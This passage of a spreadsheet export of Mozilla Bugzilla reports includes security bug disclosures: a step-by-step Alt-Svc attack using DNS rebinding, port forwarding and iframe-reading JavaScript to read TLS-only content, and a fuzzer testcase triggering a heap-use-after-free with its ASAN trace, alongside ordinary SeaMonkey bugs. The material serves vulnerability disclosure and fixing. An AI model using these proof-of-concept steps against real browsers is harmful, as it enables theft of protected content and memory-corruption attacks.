80 - Open to the internet. /.well-known/http-opportunistic is placed.
443 (h2) - Same as port 80.
8443 (TLS) - It serves secret file.
---------------------------------------------------------------------
The problem is that Firefox performs opt-in checking only in the first h2 connection to alternative service. This means active network attacker can forward second or sebsequent connection to a port other than 443 (8443 port above, encrypted, not opted-in). The encrypted content from 8443 port can be read by unencrypted content. This way, Firefox's implementation of OE put non opted-in TLS ports at risk.
An attack example is as follows. The attacker controls DNS records and has a server (2.2.2.2) on the internet. Port 8443 on example.jp (1.1.1.1) is the attack target.
---------------------------------------------------------------------
■Attacker's server (IPAddr: 2.2.2.2)
80 - It serves a copy of .well-known JSON file and a page for attack.
---------------------------------------------------------------------
(1)
Attacker manipulates DNS record: example.jp. 0 IN A 2.2.2.2.
Attacker configures port forwarding: 2.2.2.2:8443 to 1.1.1.1:443.
(2)
Victim user navigates to http://example.jp/ (2.2.2.2).
&gt; Alt-Svc: h2="example.jp:8443"; ma=120
&gt; 
&gt; &lt;iframe src="/test"&gt;&lt;/iframe&gt;
&gt; &lt;script&gt;
&gt; // Get iframe source repeatedly
&gt; setInterval(() =&gt; {
&gt;     var i = frames[0];
&gt;     i.location.reload();
&gt;     setTimeout(() =&gt; {console.log(i.document.body.textContent)}, 1000);
&gt; }, 5000);
&gt; &lt;/script&gt;
Opt-in is OK because h2 connection to example.jp:8443 (2.2.2.2:8443) is forwarded to 1.1.1.1:443.
(3)
Attacker restores DNS record: example.jp. 0 IN A 1.1.1.1.
Attacker then shuts down port forwarding running at 2.2.2.2:8443.
JavaScript in (2) now fetches content from 8443 TLS with no errors.
Possible fix for this issue is to perform opt-in checking upon every new h2 connection to alternative service (obviously, non opted-in ports could detect this kind of attack by checking Alt-Used or Host header (port number), but necessity for such defense is not mentioned in RFC).
One more thing to note is that, incompliant with last paragraph of RFC 7838 section 2.4, Firefox checks ALPN protocol name ONLY on the first connection to alternative service. In other words, no protocol name checking is performed in the second and subsequent connections (same goes for upgrading http/1.1 TLS to h2). This increases the possibility of successful exploitation including cross-protocol attack, so it's safer to limit alternative service connections to h2/h3 only.</t>
        </is>
      </c>
      <c r="X4035" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4036">
      <c r="A4036" t="n">
        <v>1123882</v>
      </c>
      <c r="B4036" t="inlineStr">
        <is>
          <t>2015-01-20 13:04:32 -0800</t>
        </is>
      </c>
      <c r="C4036" t="inlineStr">
        <is>
          <t>MediaDecoderStateMachine::SendStreamAudio passes an incorrect buffer size to AudioSegment::AppendFrames when |offset| is non-zero</t>
        </is>
      </c>
      <c r="D4036" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:04 -0700</t>
        </is>
      </c>
      <c r="E4036" t="n">
        <v>1</v>
      </c>
      <c r="F4036" t="n">
        <v>1</v>
      </c>
      <c r="G4036" t="n">
        <v>3</v>
      </c>
      <c r="H4036" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4036" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4036" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4036" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4036" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4036" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4036" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4036" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4036" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+]</t>
        </is>
      </c>
      <c r="Q4036" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4036" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4036" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T4036" t="n">
        <v>1</v>
      </c>
      <c r="U4036" t="n">
        <v>0</v>
      </c>
      <c r="V4036" t="n">
        <v>25</v>
      </c>
      <c r="W4036" t="inlineStr">
        <is>
          <t>Observed multiple ASAN crashes (buffer overflow, read) with the failure here:
https://treeherder.mozilla.org/logviewer.html#?job_id=4289100&amp;repo=try
It looks like our problem is here:
https://dxr.mozilla.org/mozilla-central/source/dom/media/MediaDecoderStateMachine.cpp#348
aOutput-&gt;AppendFrames(buffer.forget(), channels, aAudio-&gt;mFrames);
Should probably be
aOutput-&gt;AppendFrames(buffer.forget(), channels, aAudio-&gt;mFrames - offset);
correct?</t>
        </is>
      </c>
      <c r="X4036" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4037">
      <c r="A4037" t="n">
        <v>166955</v>
      </c>
      <c r="B4037" t="inlineStr">
        <is>
          <t>2002-09-05 16:17:56 -0700</t>
        </is>
      </c>
      <c r="C4037" t="inlineStr">
        <is>
          <t>type ahead find causes typing failure in mail compose window after returning from browser</t>
        </is>
      </c>
      <c r="D4037" t="inlineStr">
        <is>
          <t>2011-08-05 21:10:04 -0700</t>
        </is>
      </c>
      <c r="E4037" t="n">
        <v>1</v>
      </c>
      <c r="F4037" t="n">
        <v>1</v>
      </c>
      <c r="G4037" t="n">
        <v>2</v>
      </c>
      <c r="H4037" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4037" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4037" t="inlineStr">
        <is>
          <t>Find In Page</t>
        </is>
      </c>
      <c r="K4037" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4037" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4037" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4037" t="inlineStr"/>
      <c r="Q4037" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4037" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4037" t="inlineStr">
        <is>
          <t>mozilla1.2alpha</t>
        </is>
      </c>
      <c r="T4037" t="n">
        <v>1</v>
      </c>
      <c r="U4037" t="n">
        <v>0</v>
      </c>
      <c r="V4037" t="n">
        <v>8</v>
      </c>
      <c r="W4037" t="inlineStr">
        <is>
          <t>Every other time you return to a mail compose window from a browser window, type
ahead find is enabled in the mail compose window, causing you not to be able to
type additional alphanumeric characters into your message.
Steps to Reproduce:
1. Start composing a new message.
2. Go to a browser window.
3. Return to the message compose window.
4. Type more alphanumeric characters.
5. If your characters appear, repeat steps 2, 3, and 4.
Expected Results: your characters appear.
Actual Results: your characters do not appear, and on Windows the type ahead
find bell rings (saying it can't find the characters you type)
Additional Information:
Reproduced on Linux and Windows 2002-09-05.</t>
        </is>
      </c>
      <c r="X4037" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4038">
      <c r="A4038" t="n">
        <v>129988</v>
      </c>
      <c r="B4038" t="inlineStr">
        <is>
          <t>2002-03-10 16:36:32 -0800</t>
        </is>
      </c>
      <c r="C4038" t="inlineStr">
        <is>
          <t>No advance to next message if message pane focused</t>
        </is>
      </c>
      <c r="D4038" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4038" t="n">
        <v>1</v>
      </c>
      <c r="F4038" t="n">
        <v>1</v>
      </c>
      <c r="G4038" t="n">
        <v>2</v>
      </c>
      <c r="H4038" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4038" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4038" t="inlineStr">
        <is>
          <t>MailNews: Message Display</t>
        </is>
      </c>
      <c r="K4038" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4038" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4038" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4038" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4038" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4038" t="inlineStr"/>
      <c r="Q4038" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4038" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4038" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T4038" t="n">
        <v>1</v>
      </c>
      <c r="U4038" t="n">
        <v>0</v>
      </c>
      <c r="V4038" t="n">
        <v>15</v>
      </c>
      <c r="W4038" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.9+)
Gecko/20020309
BuildID:    2002030908
In Messenger while rading news (I use offline) if focus placed on message body
(right-bottom pane in 3-pane view) space bar and 'n' do not advance to next
message. However, 'Next' button on toolbar works. When subjects pane is focused
(right-top) then both shortcuts work.
Reproducible: Always
Steps to Reproduce:
1.Go to newsgroup that contains unread messages
2.Select message body pane
3.Press 'n' or space bar
Actual Results:  Message scrolls to the end but there no advance to next unread. 
Expected Results:  Next unread message should be displayed when current is
screolled to the end.</t>
        </is>
      </c>
      <c r="X4038" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4039">
      <c r="A4039" t="n">
        <v>1425000</v>
      </c>
      <c r="B4039" t="inlineStr">
        <is>
          <t>2017-12-13 05:26:02 -0800</t>
        </is>
      </c>
      <c r="C4039" t="inlineStr">
        <is>
          <t>heap-use-after-free in gfxUserFontEntry::DoLoadNextSrc</t>
        </is>
      </c>
      <c r="D4039" t="inlineStr">
        <is>
          <t>2024-05-30 09:41:10 -0700</t>
        </is>
      </c>
      <c r="E4039" t="n">
        <v>1</v>
      </c>
      <c r="F4039" t="n">
        <v>1</v>
      </c>
      <c r="G4039" t="n">
        <v>3</v>
      </c>
      <c r="H4039" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4039" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4039" t="inlineStr">
        <is>
          <t>DOM: CSS Object Model</t>
        </is>
      </c>
      <c r="K4039" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L4039" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4039" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4039" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4039" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4039" t="inlineStr">
        <is>
          <t>[adv-main58+][adv-esr52.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4039" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4039" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4039" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T4039" t="n">
        <v>1</v>
      </c>
      <c r="U4039" t="n">
        <v>0</v>
      </c>
      <c r="V4039" t="n">
        <v>24</v>
      </c>
      <c r="W4039" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox nightly (SourceStamp=defccba824aa91e8d4d820b1defaadfdca34bac7). It requires the fuzzPriv extension.
&lt;script&gt;
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {
	o179=document.cloneNode(true);
	o585=o179.fonts;
	o919=new FontFace('font7',"url('X')");
	o585.add(o919);
        o585.clear();
	spin();
	o585=null;o179=null;
	fuzzPriv.GC();fuzzPriv.CC();
	o919.load();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==18235==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000076920 at pc 0x7f7e6c98867b bp 0x7ffe8ea8fe70 sp 0x7ffe8ea8fe68
READ of size 8 at 0x608000076920 thread T0 (file:// Content)
    #0 0x7f7e6c98867a in gfxUserFontEntry::DoLoadNextSrc(bool) /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:560:41
    #1 0x7f7e716df45a in DoLoad /builds/worker/workspace/build/src/layout/style/FontFace.cpp:423:19
    #2 0x7f7e716df45a in mozilla::dom::FontFace::Load(mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/layout/style/FontFace.cpp:394
    #3 0x7f7e6ec30849 in load /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FontFaceBinding.cpp:1192:45
    #4 0x7f7e6ec30849 in mozilla::dom::FontFaceBinding::load_promiseWrapper(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::FontFace*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FontFaceBinding.cpp:1209
    #5 0x7f7e6f14f4cf in mozilla::dom::GenericPromiseReturningBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3088:13
    #6 0x7f7e75cf0014 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #7 0x7f7e75cf0014 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #8 0x7f7e75cd60f6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #9 0x7f7e75cd60f6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #10 0x7f7e75cc2860 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #11 0x7f7e75cf054c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #12 0x7f7e75cf1072 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #13 0x7f7e767ec5ec in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2995:12
    #14 0x7f7e6ea8070e in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #15 0x7f7e6f646fd3 in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #16 0x7f7e6f646fd3 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #17 0x7f7e6f60d901 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
    #18 0x7f7e6f60f812 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
    #19 0x7f7e6f5fa1ff in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #20 0x7f7e6f5fdaeb in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #21 0x7f7e71bf6491 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1070:7
    #22 0x7f7e74f6d2c2 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7907:21
    #23 0x7f7e74f691ea in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7700:7
    #24 0x7f7e74f70fef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #25 0x7f7e6bdf7c77 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1319:3
    #26 0x7f7e6bdf6e81 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
    #27 0x7f7e6bdf3b14 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
    #28 0x7f7e6bdf5b4c in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:633:5
    #29 0x7f7e6bdf6a6c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #30 0x7f7e6a0b840a in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #31 0x7f7e6d0de377 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9118:18
    #32 0x7f7e6d0de377 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9040
    #33 0x7f7e6d0ba50a in nsDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5680:3
    #34 0x7f7e6d1393f4 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
    #35 0x7f7e6d1393f4 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
    #36 0x7f7e6d1393f4 in mozilla::detail::RunnableMethodImpl&lt;nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
    #37 0x7f7e69ecab94 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #38 0x7f7e69ef147e in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1033:14
    #39 0x7f7e69f0cde0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:508:10
    #40 0x7f7e6ad942ba in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #41 0x7f7e6aceb249 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #42 0x7f7e6aceb249 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #43 0x7f7e6aceb249 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #44 0x7f7e712e79aa in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #45 0x7f7e75a2202b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #46 0x7f7e6aceb249 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #47 0x7f7e6aceb249 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #48 0x7f7e6aceb249 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #49 0x7f7e75a21a1d in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:701:34
    #50 0x4ee965 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #51 0x4ee965 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #52 0x7f7e88f6582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #53 0x41dfe8 in _start (/fuzzer3/firefox/firefox+0x41dfe8)
0x608000076920 is located 0 bytes inside of 88-byte region [0x608000076920,0x608000076978)
freed by thread T0 (file:// Content) here:
    #0 0x4bea42 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7f7e716e2fc6 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/gfxUserFontSet.h:184:5
    #2 0x7f7e716e2fc6 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:41
    #3 0x7f7e716e2fc6 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:398
    #4 0x7f7e716e2fc6 in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:66
    #5 0x7f7e716e2fc6 in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:168
    #6 0x7f7e716e2fc6 in ImplCycleCollectionUnlink&lt;mozilla::dom::FontFaceSet::UserFontSet&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:423
    #7 0x7f7e716e2fc6 in mozilla::dom::FontFaceSet::cycleCollection::Unlink(void*) /builds/worker/workspace/build/src/layout/style/FontFaceSet.cpp:93
    #8 0x7f7e69d81454 in nsCycleCollector::CollectWhite() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3396:26
    #9 0x7f7e69d8418d in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3764:24
    #10 0x7f7e69d87dd0 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4310:21
    #11 0x7f7e6d1ce61c in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1505:3
    #12 0x7f7e6ccedbcb in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1449:3
    #13 0x7f7e69f1d3b1 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:106
    #14 0x7f7e6b90e2dd in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1948:12
    #15 0x7f7e6b90e2dd in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1267
    #16 0x7f7e6b90e2dd in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1234
    #17 0x7f7e6b914b74 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:929:12
    #18 0x7f7e75cf0014 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #19 0x7f7e75cf0014 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #20 0x7f7e75cd60f6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #21 0x7f7e75cd60f6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #22 0x7f7e75cc2860 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #23 0x7f7e75cf054c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #24 0x7f7e75cf1072 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #25 0x7f7e767ea171 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2936:12
    #26 0x7f7e6b824e62 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #27 0x7f7e75cf0014 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #28 0x7f7e75cf0014 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #29 0x7f7e75cd60f6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #30 0x7f7e75cd60f6 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #31 0x7f7e75cc2860 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #32 0x7f7e75cf054c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #33 0x7f7e75cf1072 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #34 0x7f7e767ec5ec in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2995:12
    #35 0x7f7e6ea8070e in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #36 0x7f7e6f646fd3 in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #37 0x7f7e6f646fd3 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #38 0x7f7e6f60d901 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
    #39 0x7f7e6f60f812 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
    #40 0x7f7e6f5fa1ff in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #41 0x7f7e6f5fdaeb in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
